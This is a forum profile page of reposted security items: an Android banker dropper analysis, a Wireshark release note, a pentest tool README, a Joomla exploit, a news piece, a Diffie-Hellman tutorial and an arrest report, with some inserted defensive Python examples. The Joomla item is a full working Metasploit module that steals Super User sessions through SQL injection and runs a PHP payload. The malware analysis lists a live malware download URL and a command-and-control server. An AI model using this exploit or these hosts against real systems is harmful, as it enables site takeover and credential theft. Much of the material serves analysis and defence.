Nytro

Administrators
Everything posted by Nytro

  1. Android malware drops Banker from PNG file

Nowadays malware tries to hide wherever it can to stay under the radar of anti-virus companies. Lately I found a Trojan dropper carrying a malicious payload, encoded in Base64 and embedded inside an image file. It's nothing special these days, but it is a very rare dropping technique. In most cases malware authors are lazy enough not to even encrypt the payload file.

Analysis

At the time of writing this blog post, this Trojan dropper is still available for download from the attacker's server (hxxp://jackdojacksgot.ru/img/Update.apk). Based on VirusTotal, detection for this Trojan dropper is very poor.

Figure 1: VirusTotal detection

This malicious application masquerades as Adobe Flash Player. Based on alternative names I found in the application resources, the malware name can differ in other versions, for example: Viber New, App4porno, CommBank, My Online Security, Viber or Whatsapp.

Figure 2: Possible Trojan dropper names

After launch, the Trojan will immediately drop its payload and ask the user to install Adobe Flash Player. But first let's take a look at the dropping technique. In the app assets there is nothing to drop other than an image file.

Figure 3: Trojan dropper assets

There is only one image of dice stored in the assets, but its size is more than 3.6 MB, and that's a bit suspicious. After inspecting the code, it turned out the application wasn't dropping this PNG file itself. The Trojan dropper first opens this image file and searches for a delimiter string, in this case "12345678901234567890". Right after this delimiter another application, encoded in Base64, is stored.

Figure 4: Dropping embedded malware
Figure 5: Binary view of PNG file

The decoded data is then stored on external storage as "prefix.apk" and the user is prompted to install it. The decoded application, prefix.apk, is a heavily obfuscated Android banker that steals user credentials. After installation it asks the user to activate Administrator rights for the application. This is the simplest method of preventing this Trojan from being uninstalled.

Figure 6: Banker install and device administrator request

If the user tries to deactivate Administrator rights, they are repeatedly asked to activate them again. There are two ways to get rid of this nasty banker: either boot your device into safe mode, deactivate Administrator rights and uninstall it, or use Android Debug Bridge (adb) and uninstall it from your computer. Both apps, the Trojan dropper and the dropped banker, are most probably obfuscated and protected by DexProtector. It's very complicated to analyze them statically without any dynamic intervention.

Figure 7: Code obfuscation

The banker can steal user login credentials or credit card information using a phishing technique. When the user opens their mobile banking application, or just the Google Play Store, a malicious activity is displayed on top of the official application. This way the user can easily be fooled into entering sensitive information into the banker's pop-up window.

Figure 8: Banker's phishing windows

User credentials are immediately sent to a remote server.

Figure 9: Sending stolen credentials for the Gmail app
Figure 10: Sending stolen credentials for the CommBank app
Figure 11: Sending stolen credentials for the PayPal app

This banker is very popular. Lately I tweeted about the same banker stored on a different server.

More information

HASH dropper: 1F41BA0781D51751971EE705DFA307D2
HASH PNG: 575551FBC343EC8E1A1C771D81963096
HASH dropped: 90886B56372F5191A78A20DCB3F9FE6E
Download link: http://jackdojacksgot.ru/img/Update.apk
Remote server: 75jng75ufnf.ru:2080

Posted by Lukas Stefanko at 11:47 PM

Source: http://b0n1.blogspot.ro/2015/11/android-malware-drops-banker-from-png.html
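An added example (not code from the post or from the malware's author) reproducing the carving step the analysis describes: it walks the PNG chunk list to IEND, reports the bytes that trail the image, and then Base64-decodes whatever follows the "12345678901234567890" delimiter, the same way the dropper does. The 1x1 PNG and the ZIP-headed stand-in for prefix.apk are constructed inline; the assumption that nothing else follows the delimiter is mine, not the post's.

```python
import base64
import struct
import zlib
from typing import Optional

# Delimiter the dropper searches for, as reported in the post.
DELIMITER = b"12345678901234567890"
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Encode one PNG chunk: 4-byte length, type, data, CRC32 over type + data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_png() -> bytes:
    """Constructed stand-in for the dice image: a valid 1x1 white RGB PNG."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1, 8-bit, colour type 2 (RGB)
    scanline = b"\x00\xff\xff\xff"                         # filter byte 0 + one white pixel
    return (PNG_SIGNATURE
            + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(scanline))
            + _chunk(b"IEND", b""))


def build_carrier_png(payload: bytes) -> bytes:
    """Constructed carrier: the same PNG with DELIMITER + Base64(payload) glued after IEND,
    the layout the post describes (assumption: nothing else follows the delimiter)."""
    return build_png() + DELIMITER + base64.b64encode(payload)


def png_trailer(data: bytes) -> bytes:
    """Walk the chunk list, verifying each CRC, and return every byte after the IEND chunk.
    Image viewers stop at IEND, so a clean file yields b'' and a carrier yields its cargo."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 8 + length + 4
        if end > len(data):
            raise ValueError("truncated chunk")
        expected = struct.unpack(">I", data[end - 4:end])[0]
        if zlib.crc32(data[pos + 4:end - 4]) & 0xFFFFFFFF != expected:
            raise ValueError("bad CRC in %r chunk" % ctype)
        pos = end
        if ctype == b"IEND":
            return data[pos:]
    raise ValueError("no IEND chunk")


def extract_payload(data: bytes, delimiter: bytes = DELIMITER) -> Optional[bytes]:
    """Reproduce the dropper's own logic: locate the delimiter and Base64-decode what follows.
    Returns None when the delimiter is absent, so a clean image is not mistaken for a carrier."""
    idx = data.find(delimiter)
    if idx < 0:
        return None
    return base64.b64decode(data[idx + len(delimiter):], validate=True)


def looks_like_apk(payload: bytes) -> bool:
    """An APK is a ZIP archive, so a decoded dropper payload starts with the ZIP local-file header."""
    return payload.startswith(b"PK\x03\x04")


if __name__ == "__main__":
    fake_apk = b"PK\x03\x04" + bytes(64)   # constructed: ZIP magic plus filler, not a real APK
    carrier = build_carrier_png(fake_apk)
    print("trailer bytes after IEND:", len(png_trailer(carrier)))
    print("payload is APK-shaped:", looks_like_apk(extract_payload(carrier)))
```

Checking for non-empty data after IEND is a cheap triage rule for any image shipped in an APK's assets: a viewer never reads past IEND, so a 3.6 MB image with a large trailer is exactly the anomaly the post flags, whatever delimiter a given sample uses.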
  2. Network protocol analyzer Wireshark 2.0 released

Posted on 24 November 2015.

Wireshark, the most popular network protocol analyzer, has reached version 2.0. It features a completely new user interface which should provide a smoother, faster user experience. Here's an in-depth video introduction to Wireshark 2.0.

The libwireshark API has undergone some major changes:

• The emem framework (including all ep_ and se_ memory allocation routines) has been completely removed in favour of wmem, which is now fully mature.
• The (long-since-broken) Python bindings support has been removed. If you want to write dissectors in something other than C, use Lua.
• Plugins can now create GUI menu items.
• Heuristic dissectors can now be globally enabled/disabled, so heur_dissector_add() has a few more parameters to make that possible.
• proto_tree_add_text has been removed.
• tvb_length() has been removed in favor of tvb_reported_length() and tvb_captured_length().
• The API for ONC RPC-based dissectors has changed significantly: the procedure dissectors no longer take an offset, void-argument procedures now need to be declared with a function (use dissect_rpc_void()), and rpc_init_prog() now handles procedure registration too (it takes additional arguments to handle this; rpc_init_proc_table() was removed).

The following features are new (or have been significantly updated) since version 2.0.0rc3:

• An RTP player crash has been fixed.
• Flow graph issues have been fixed.
• A Follow Stream dialog crash has been fixed.
• An extcap crash has been fixed.
• A file merge crash has been fixed.
• A handle leak crash has been fixed.
• Several other crashes and usability issues have been fixed.

Source: http://www.net-security.org/secworld.php?id=19147
  3. Nytro

    autopwn

    Specify targets and run sets of tools against them

autopwn is designed to make a pentester's life easier and more consistent by allowing them to specify tools they would like to run against targets, without having to type them in a shell or write a script. This tool will probably be useful during certain exams as well.

Installation

It is recommended that you use the docker image while exposing TCP 5000 for autopwn clients to connect to. This is because the autopwn docker image is already set up (tools are installed and in the right place).

Only allow this package to listen on a loopback IP address. If you have this package listen on a public IP, you're allowing arbitrary users to execute commands as root on your server. Eventually, HTTPS and credentials will be required, but for now, don't be a moron.

From Docker

1. Execute docker pull rascal999/autopwn
2. Run docker run -i -t -p 127.0.0.1:5000:5000 rascal999/autopwn /usr/sbin/autopwn
3. Run the autopwn client (you can get the Java application at https://github.com/rascal999/autopwn-gui)

From the Python Package Index (for development)

1. Execute pip install autopwn

From this repository

1. Clone the Git repository
2. Change into the newly created directory
3. Execute pip install .

Usage

Running autopwn will start the web server. Sample output:

 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
 * Restarting with stat
127.0.0.1 - - [15/Nov/2015 11:04:41] "GET /ping HTTP/1.1" 200 -
127.0.0.1 - - [15/Nov/2015 11:04:41] "GET /favicon.ico HTTP/1.1" 404 -

In order to interface with autopwn you should use autopwn-gui (available at https://github.com/rascal999/autopwn-gui). You can also use autopwn-cli (available at https://github.com/rascal999/autopwn-cli). If you're interested in the API, you can also do stuff in the browser.

Contributing

1. Fork it!
2. Create your feature branch: git checkout -b my-new-feature
3. Commit your changes: git commit -am 'Add some feature'
4. Push to the branch: git push origin my-new-feature
5. Submit a pull request

Credits

Developed by Aidan Marlin (aidan [dot] marlin [at] nccgroup [dot] com) while working at NCC Group.

I'd like to thank the following contributors for their work on previous autopwn versions:

• Selfegris
• 0xsauby
• berdario

Source: https://github.com/nccgroup/autopwn
  4. Joomla Content History SQLi Remote Code Execution

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Joomla Content History SQLi Remote Code Execution",
      'Description'    => %q{
        This module exploits a SQL injection vulnerability found in Joomla versions
        3.2 up to 3.4.4. The vulnerability exists in the Content History administrator
        component in the core of Joomla. Triggering the SQL injection makes it possible
        to retrieve active Super User sessions. The cookie can be used to login to the
        Joomla administrator backend. By creating a new template file containing our
        payload, remote code execution is made possible.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Asaf Orpani',                   # Vulnerability discovery
          'xistence <xistence[at]0x90.nl>' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2015-7857' ], # Admin session hijacking
          [ 'CVE', '2015-7297' ], # SQLi
          [ 'CVE', '2015-7857' ], # SQLi
          [ 'CVE', '2015-7858' ], # SQLi
          [ 'URL', 'https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/' ],
          [ 'URL', 'http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html' ]
        ],
      'Payload'        =>
        {
          'DisableNops' => true,
          # Arbitrary big number. The payload gets sent as POST data, so
          # really it's unlimited
          'Space'       => 262144, # 256k
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Joomla 3.x <= 3.4.4', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Oct 23 2015",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to Joomla', '/'])
      ], self.class)
  end

  def check
    # Request using a non-existing table
    res = sqli(rand_text_alphanumeric(rand(10)+6))

    if res && res.body =~ /`(.*)_ucm_history`/
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def sqli( tableprefix )
    # SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in).
    # The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history.
    # This way we make sure that's excluded and we only get real admin sessions.
    sql = " (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)"

    # Retrieve cookies
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "index.php"),
      'vars_get' => {
        'option'         => 'com_contenthistory',
        'view'           => 'history',
        'list[ordering]' => '',
        'item_id'        => '1',
        'type_id'        => '1',
        'list[select]'   => sql
      }
    })

    return res
  end

  def exploit
    # Request using a non-existing table first, to retrieve the table prefix
    res = sqli(rand_text_alphanumeric(rand(10)+6))

    if res && res.code == 500 && res.body =~ /`(.*)_ucm_history`/
      table_prefix = $1
      print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]")
    else
      fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix")
    end

    # Retrieve the admin session using our retrieved table prefix
    res = sqli("#{table_prefix}_")

    if res && res.code == 500 && res.body =~ /Duplicate entry '([a-z0-9]+)' for key/
      auth_cookie_part = $1[0...-1]
      print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]")
    else
      fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!")
    end

    # Retrieve cookies
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, "administrator", "index.php")
    })

    if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/
      cookie_begin = $1
      print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]")
    else
      fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie")
    end

    # Modify cookie to authenticated admin
    auth_cookie = cookie_begin
    auth_cookie << "="
    auth_cookie << auth_cookie_part
    auth_cookie << ";"

    # Authenticated session
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, "administrator", "index.php"),
      'cookie' => auth_cookie
    })

    if res && res.code == 200 && res.body =~ /Administration - Control Panel/
      print_status("#{peer} - Successfully authenticated as Administrator")
    else
      fail_with(Failure::Unknown, "#{peer} - Session failure")
    end

    # Retrieve template view
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
      'cookie'   => auth_cookie,
      'vars_get' => {
        'option' => 'com_templates',
        'view'   => 'templates'
      }
    })

    # We try to retrieve and store the first template found
    if res && res.code == 200 && res.body =~ /\/administrator\/index.php\?option=com_templates&view=template&id=([0-9]+)&file=([a-zA-Z0-9=]+)/
      template_id = $1
      file_id = $2
    else
      fail_with(Failure::Unknown, "Unable to retrieve template")
    end

    filename = rand_text_alphanumeric(rand(10)+6)

    # Create file
    print_status("#{peer} - Creating file [ #{filename}.php ]")
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, "administrator", "index.php"),
      'cookie'    => auth_cookie,
      'vars_get'  => {
        'option' => 'com_templates',
        'task'   => 'template.createFile',
        'id'     => template_id,
        'file'   => file_id,
      },
      'vars_post' => {
        'type' => 'php',
        'name' => filename
      }
    })

    # Grab token
    if res && res.code == 303 && res.headers['Location']
      location = res.headers['Location']
      print_status("#{peer} - Following redirect to [ #{location} ]")
      res = send_request_cgi(
        'uri'    => location,
        'method' => 'GET',
        'cookie' => auth_cookie
      )

      # Retrieving template token
      if res && res.code == 200 && res.body =~ /&([a-z0-9]+)=1\">/
        token = $1
        print_status("#{peer} - Token [ #{token} ] retrieved")
      else
        fail_with(Failure::Unknown, "#{peer} - Retrieving token failed")
      end

      if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/
        template_path = $1
        print_status("#{peer} - Template path [ #{template_path} ] retrieved")
      else
        fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path")
      end
    else
      fail_with(Failure::Unknown, "#{peer} - Creating file failed")
    end

    filename_base64 = Rex::Text.encode_base64("/#{filename}.php")

    # Inject payload data into file
    print_status("#{peer} - Insert payload into file [ #{filename}.php ]")
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, "administrator", "index.php"),
      'cookie'    => auth_cookie,
      'vars_get'  => {
        'option' => 'com_templates',
        'view'   => 'template',
        'id'     => template_id,
        'file'   => filename_base64,
      },
      'vars_post' => {
        'jform[source]'       => payload.encoded,
        'task'                => 'template.apply',
        token                 => '1',
        'jform[extension_id]' => template_id,
        'jform[filename]'     => "/#{filename}.php"
      }
    })

    if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/
      print_status("#{peer} - Payload data inserted into [ #{filename}.php ]")
    else
      fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #{filename}.php ]")
    end

    # Request payload
    register_files_for_cleanup("#{filename}.php")
    print_status("#{peer} - Executing payload")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, template_path, "#{filename}.php"),
      'cookie' => auth_cookie
    })
  end
end

Source: https://www.exploit-db.com/exploits/38797/
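An added detection example, not part of the exploit or the Exploit-DB page: it scans constructed Apache access-log lines for the request shape the module sends (index.php with option=com_contenthistory and SQL syntax inside a list[...] parameter), and separately flags 500 responses from that component, since the module deliberately provokes a database error to read the table prefix and the "Duplicate entry" line. The log lines, the j3_ table prefix and the regexes are my assumptions.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format lines (sample data, not from the post).
# Line 3 mirrors the module's check() request with a SQL expression in list[select];
# line 4 hits the same component with a harmless value; line 5 is a bare 500 from it.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Nov/2015:10:01:02 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [23/Nov/2015:10:01:05 +0000] "GET /administrator/index.php HTTP/1.1" 200 3100 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Nov/2015:10:02:11 +0000] "GET /index.php?option=com_contenthistory&view=history&list%5Bordering%5D=&item_id=1&type_id=1&list%5Bselect%5D=%28select+1+FROM%28select+count%28*%29%2Cconcat%28%28select+session_id+FROM+j3_session+LIMIT+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+FROM+information_schema.tables+GROUP+BY+x%29a%29 HTTP/1.1" 500 2210 "-" "Mozilla/5.0"
10.0.0.9 - - [23/Nov/2015:10:03:40 +0000] "GET /index.php?option=com_contenthistory&view=history&item_id=1&type_id=1&list%5Bselect%5D=h.version_id HTTP/1.1" 200 900 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Nov/2015:10:02:13 +0000] "GET /index.php?option=com_contenthistory&view=history&item_id=1&type_id=1 HTTP/1.1" 500 2210 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Tokens that have no business in a list[...] ordering/select parameter.
SQL_RE = re.compile(
    r"\b(select|union|from|concat|information_schema)\b|\bgroup\s+by\b|\b(rand|floor|count)\s*\(",
    re.IGNORECASE,
)


def classify_request(line: str) -> Optional[Dict]:
    """Return a finding for one log line, or None when the line is not of interest."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # parse_qs undoes both %XX and '+' encoding, so the regex sees the SQL as the server did.
    params = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
    if params.get("option", [""])[0] != "com_contenthistory":
        return None
    status = int(m.group("status"))
    hits = {k: v for k, v in params.items()
            if k.startswith("list[") and any(SQL_RE.search(x) for x in v)}
    if hits:
        return {"ip": m.group("ip"), "ts": m.group("ts"), "severity": "high",
                "status": status, "params": hits}
    if status == 500:
        # No SQL visible, but error-based extraction needs the DB error to reach the client;
        # a 500 from this component is worth a look on its own.
        return {"ip": m.group("ip"), "ts": m.group("ts"), "severity": "low",
                "status": status, "params": {}}
    return None


def scan_log(text: str) -> List[Dict]:
    """Run classify_request over every line and keep the findings."""
    return [f for f in (classify_request(line) for line in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["severity"], finding["ip"], finding["status"], sorted(finding["params"]))
```

The high-severity rule keys on decoded parameter content rather than on the raw URL, so the usual `%28select` style encoding does not hide the query; the low-severity rule exists because, as the module shows, the attacker's first request is designed to fail with a 500 whose body leaks the table prefix.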
  5. A programmer wrote scripts to secretly automate a lot of his job — and email his wife and make a latte

Julie Bort

There's a hilarious project that's popular on GitHub, the website that hosts all kinds of software that programmers want to share with each other. The project was shared by a programmer named Nihad Abbasov, known as "Narkoz" on GitHub. It consists of a bunch of software scripts with some funny but NSFW names. Narkoz says that the scripts came from one of his coworkers who left for another company, the type of guy that "if something — anything — requires more than 90 seconds of his time, he writes a script to automate that." After the guy left for a new job, his former coworkers were looking through his work and discovered that the guy had automated all sorts of crazy things, including parts of his job, his relationships, and making coffee.

The guy wrote one script that sends a text message "late at work" to his wife and "automatically picks reasons" from a preset list of them, says Narkoz. It sent this text anytime there was activity with his login on the company's computer servers after 9 p.m.

He wrote another script relating to a customer he didn't like, given the not-nice name he chose for this script. It scans his inbox for an email from the customer that uses words like "help," "trouble," and "sorry" and automatically rolls the guy's database to the latest backup, then sends a reply: "No worries mate, be careful next time."

With another script, he automatically fired off an email excuse like "not feeling well, working from home" if he wasn't at work and logged in to the servers by 8:45 a.m. He called that script "hangover."

And the best one? He wrote a script that waits 17 seconds, then hacks into the coffee machine and orders it to start brewing a latte. The script tells the machine to wait another 24 seconds before pouring the latte into a cup, the exact time it takes to walk from the guy's desk to the coffee machine. And his coworkers didn't even know the coffee machine was on the network and hackable.

Source: http://www.businessinsider.com/programmer-automates-his-job-2015-11
  6. As a side project I have been doing some self-study on encryption to better understand it. It is how we protect our data as it travels across the internet or when at rest, we use concepts from it to verify that we sent messages, and whole currency schemes are built around the idea. Encryption is an incredibly dense topic and it is easy to mess up. As such, all of the code I have written should not be used for any real encryption. The goal here is to make some of the concepts easier to understand. For those interested in learning more about the history, I quite enjoyed The Code Book. As for a more in-depth understanding of cryptography, take a look at Cryptography Engineering. Then you and I can struggle through it together!

Diffie-Hellman Key Exchange

The first topic for encryption we will go over is the Diffie-Hellman Key Exchange (DHKE). I think there is no better way to explain the basics than how Wikipedia does, specifically in the image below. Alice and Bob want to share a key to encrypt their communications. Using paint (instead of math) we think of it like so:

1. Alice and Bob decide on a common paint color
2. Alice and Bob pick their own secret paint color
3. Alice and Bob combine their secret color with the common color
4. Alice and Bob trade this mixed paint
5. Alice mixes Bob's paint with her secret color
6. Bob mixes Alice's paint with his secret color
7. Now Alice and Bob have a shared secret color

(Alice and Bob will be recurring characters so you will have to get used to them!)

DHKE described using paint (courtesy Wikipedia)

The Key

This section is more of a big picture section, so if you already have a basic understanding of encryption feel free to move on (or not, maybe you enjoy reading what I write). A key, in cryptography, is used to lock and unlock a message. But imagine trying to share a key and send a message to someone via a courier. If the message is clear text, the courier can read it. So we encrypt it. How do we then share a key with that person to decrypt it? If we just send the key, then the courier has that also and can decrypt it. DHKE aims to solve that problem. Let's take a look at a working example.

A Working Example

I wrote some code to handle this which you can find here. Below is the output you can see from running it (with some flags to make it more verbose).

DHKE between Alice and Bob

A note on my iconography: "x -> y :" means x sends a message to y; "Internal" means that it is occurring locally for that person.

First Alice tells Bob to set his prime base to 5 (and Eve, who is attempting to eavesdrop, sees this). Then Alice tells Bob to set his prime mod to 23 (which Eve also sees). Then both Alice and Bob create a random secret and perform a calculation using that secret and the prime base and prime mod. Then Alice tells Bob the result of her calculation and vice versa (and Eve sees both of these). Finally they perform one more set of calculations and arrive at a shared secret.

DHKE In Math

So how does this actually work? Modular arithmetic to the rescue! The equation that we are looking at is g^x mod p. g and p combine (sort of) to make our common paint. There are some restrictions around what numbers we are allowed to choose for g and x, one of which I discuss later, but we do know that p is prime. x is where this gets interesting. Alice and Bob will each select their own secret number for this (their secret paint as it were), a and b respectively. This can be any number. Then each calculates g^x mod p, and shares it (their mixed paint). Now Alice has g^b mod p (B from now on) from Bob and Bob has g^a mod p (A from now on) from Alice (Eve would have these as well). Then each takes their secret key and combines it mod p with the number they received. So Alice has B^a mod p and Bob has A^b mod p, which is their secret key. Wait, B^a mod p and A^b mod p are the secret keys? That must mean they are the same value! How cool is that?

Let's go back through the steps to understand it better.

1. Alice and Bob decide on two numbers g and p.
2. Alice and Bob select a secret number, a and b respectively
3. Alice and Bob calculate g^x mod p where x is their number
4. Alice and Bob share these numbers (A and B)
5. Alice and Bob combine the shared number with their secret to generate the shared secret

So let's look at what we have at step 5:

Alice has: B^a mod p = (g^b mod p)^a mod p = g^ab mod p
Bob has: A^b mod p = (g^a mod p)^b mod p = g^ab mod p

You might be saying, I still don't get why that works. This is where a deeper understanding of modular arithmetic comes in handy. I will walk you through some of the basics (or not, if you have already had enough math, but I would say soldier on, you only need elementary math knowledge for the most part).

When we calculate something like y mod z what we are really calculating is the remainder of y / z (or y % z in a lot of programming languages). When y < z then y % z is y. When it is larger it works like a clock. As y grows, y % z will go through all values 0 to z - 1 until it is a multiple of z and then it will go back to 0 and then it will proceed through all of those values again. It turns out that the exponentiation operation in modular arithmetic is transitive. So (a^b)^c mod d = (a^c)^b mod d = a^(bc) mod d. So Alice is calculating (g^b mod p)^a mod p which is (g^b)^a mod p. From that, both sides end up having g^ab mod p.

This is where one of the restrictions on g and p comes in. For a^b mod c, the possible results can be limited depending on the numbers selected. Let's look at an example: a^b mod 7.

2^1 mod 7 = 2 mod 7 = 2
2^2 mod 7 = 4 mod 7 = 4
2^3 mod 7 = 8 mod 7 = 1
2^4 mod 7 = 16 mod 7 = 2
2^5 mod 7 = 32 mod 7 = 4
2^6 mod 7 = 64 mod 7 = 1
...

See where that is an issue? It only results in 3 numbers, which means that only half of all numbers less than 7 can be a key (and limiting the key space is a bad thing!). So instead we pick a number like 3:

3^1 mod 7 = 3 mod 7 = 3
3^2 mod 7 = 9 mod 7 = 2
3^3 mod 7 = 27 mod 7 = 6
3^4 mod 7 = 81 mod 7 = 4
3^5 mod 7 = 243 mod 7 = 5
3^6 mod 7 = 729 mod 7 = 1
...

Here we can see that 3^x mod 7 can be any number less than 7, so our key space is larger. If you want to learn more about that, it's called a primitive root modulo n.

The Benefits

Alice and Bob have managed to generate the same number, but how does that solve this problem? Let's look at this from Eve's perspective.

What Eve sees from Alice and Bob's DHKE

Without any of the flags, the output shows only what Eve can see. In this example, Eve sees g and p as well as A and B. To determine what the secret key is, Eve needs to determine what a (or b) is, which means solving this equation for a: A = g^a mod p. As it turns out, this is a very tough equation to solve. These tough problems are often called trap door functions, functions that are easy to calculate in one direction, but not in the other (some doors you can't come back from). This problem is specifically called the discrete logarithm problem, if you're interested in looking further.

That means that Alice and Bob have shared a number, over an insecure medium, without revealing what that number is. Using that number, they can now send messages that are encrypted that they both can decrypt. Yay!

Now you know a little bit more about DHKE and how we protect our secrets. To promote further security, we actually will regenerate a key for each session. So if one of your keys traded in this manner is ever actually calculated, it only affects that session. This is what we call forward secrecy! I have two more concepts on deck to talk about soon (you may have noticed the git repository), the RSA algorithm for asymmetric encryption and HMACs. Once I have them completed the last sentence will contain links! Go forth and hack encrypt!

References:
https://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange
https://en.wikipedia.org/wiki/Discrete_logarithm_problem
https://en.wikipedia.org/wiki/Primitive_root_modulo_n

Malarkey

Source: https://warroom.securestate.com/index.php/encryption-basics-dhke/
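An added example (mine, not the post's code or its linked repository) that carries the post's numbers through in Python: the base 5 and modulus 23 exchange, a primitive-root check that catches the 2 mod 7 case the post warns about, and Eve's brute-force recovery of a secret, which only succeeds because p is tiny. The fixed secrets 6 and 15 are assumed values chosen for reproducibility, not taken from the post.

```python
import secrets


def mod_order(g: int, p: int) -> int:
    """Smallest k >= 1 with g^k = 1 (mod p): how many distinct values g^x mod p can take."""
    k, x = 1, g % p
    while x != 1:
        x = (x * g) % p
        k += 1
    return k


def is_primitive_root(g: int, p: int) -> bool:
    """g generates the whole multiplicative group mod p iff its order is p - 1."""
    return mod_order(g, p) == p - 1


def dh_public(g: int, p: int, secret: int) -> int:
    """The mixed paint: g^secret mod p (three-argument pow is modular exponentiation)."""
    return pow(g, secret, p)


def dh_shared(their_public: int, my_secret: int, p: int) -> int:
    """Mix the received value with your own secret: B^a mod p or A^b mod p."""
    return pow(their_public, my_secret, p)


def random_secret(p: int) -> int:
    """Fresh per-session exponent in [1, p-2]; a new one each session is the forward secrecy the post mentions."""
    return 1 + secrets.randbelow(p - 2)


def eve_discrete_log(g: int, p: int, public: int) -> int:
    """Eve's only route with g, p and A: try every x until g^x = A. Trivial for p = 23,
    infeasible for the 2048-bit primes used in practice (the discrete logarithm problem)."""
    for x in range(1, p):
        if pow(g, x, p) == public:
            return x
    raise ValueError("public value is not a power of g")


def toy_exchange(g: int = 5, p: int = 23, a: int = 6, b: int = 15) -> dict:
    """Run the exchange with the post's base 5 and modulus 23 and fixed secrets so the
    result is reproducible (a = 6 and b = 15 are assumed values, not from the post)."""
    if not is_primitive_root(g, p):
        raise ValueError(f"{g} is not a primitive root mod {p}; the key space would shrink")
    A = dh_public(g, p, a)
    B = dh_public(g, p, b)
    s_alice = dh_shared(B, a, p)   # Alice: B^a mod p
    s_bob = dh_shared(A, b, p)     # Bob:   A^b mod p
    if not (s_alice == s_bob == pow(g, a * b, p)):
        raise RuntimeError("shared secrets disagree")
    return {"A": A, "B": B, "shared": s_alice, "eve_recovers_a": eve_discrete_log(g, p, A)}


if __name__ == "__main__":
    print("order of 2 mod 7:", mod_order(2, 7), "| order of 3 mod 7:", mod_order(3, 7))
    print(toy_exchange())
```

With these parameters Alice publishes A = 8 and Bob publishes B = 19, both sides land on 2, and Eve recovers a = 6 after six trial exponentiations; the order check is what turns the post's "only three results for 2 mod 7" observation into a reusable parameter-validation step.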
  7. Alleged Malware Service Operators Arrested in UK

By Eduard Kovacs on November 23, 2015

A partnership between the security firm Trend Micro and the United Kingdom's National Crime Agency (NCA) resulted in the arrests of two individuals suspected of running a website that offered cybercrime services. The suspects, a man and a woman aged 22 from Colchester, Essex, are believed to have operated a counter antivirus service called reFUD.me and a crypting service named Cryptex Reborn. They have been released on bail until February 2016. Both the Cryptex Reborn and reFUD.me services have been disrupted as a result of the operation.

